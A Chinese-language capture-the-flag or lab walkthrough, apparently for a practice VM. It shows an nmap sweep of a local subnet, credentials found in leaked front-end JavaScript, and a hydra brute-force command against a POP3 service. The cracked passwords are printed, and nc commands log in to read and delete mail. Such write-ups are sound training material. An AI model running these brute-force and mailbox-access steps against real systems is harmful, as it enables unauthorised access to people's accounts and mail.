首先用nmap -sP 192.168.124.0/24查找一下靶机的IP地址

C:\Users\Anonymous\Desktop>nmap -sP 192.168.124.0/24

Starting Nmap 7.94 ( https://nmap.org ) at 2024-09-09 12:39 中国标准时间

Nmap scan report for 192.168.124.1 --物理机地址

Host is up (0.0010s latency).

MAC Address: 00:50:56:C0:00:08 (VMware)

Nmap scan report for 192.168.124.2 --网关地址

Host is up (0.0011s latency).

MAC Address: 00:50:56:FC:73:90 (VMware)

Nmap scan report for 192.168.124.128

Host is up (0.0020s latency).

MAC Address: 00:0C:29:A5:9C:0C (VMware)

Nmap scan report for 192.168.124.254

Host is up (0.00033s latency).

MAC Address: 00:50:56:F1:12:AA (VMware)

Nmap scan report for 192.168.124.129 --攻击机地址

Host is up.

Nmap done: 256 IP addresses (5 hosts up) scanned in 2.07 seconds --有5个地址存活

192.168.124.128 192.168.124.254这两个地址暂时不知道

直接访问192.168.124.128

然后打开F12,发现把前端代码泄露出来了

1

这个js文件就是切入点,查看代码发现2个用户名,一个html编码的密码,用html解密一下

2

3

用boris登录成功,发现前端依然有注释掉的信息,前面也告诉说一直开的有pop3服务

4

用nmap -p -A 192.168.124.128扫描运行的服务5

这时候用hydra爆破登录密码,刚好能够结合上面给的两个账号,但是根据之前的成功登录,账号肯定是全小写 用cat把账号写进去

hydra 192.168.124.128 -s 55007 pop3 -L user.txt -P /usr/lib/python3/dist-packages/wapitiCore/data/attacks/passwords.txt

用户:boris 密码:secret1!

用户:natalya 密码:bird

用nc连接pop3服务

nc 192.168.124.128 55007

用nc连接时会提示连接到服务,但是不是提示要输入账号密码

6

然后 User boris pass secret1!

List查看邮件

Retr 1查看第一个邮件

Dele 1删除第一条邮件

Quit退出连接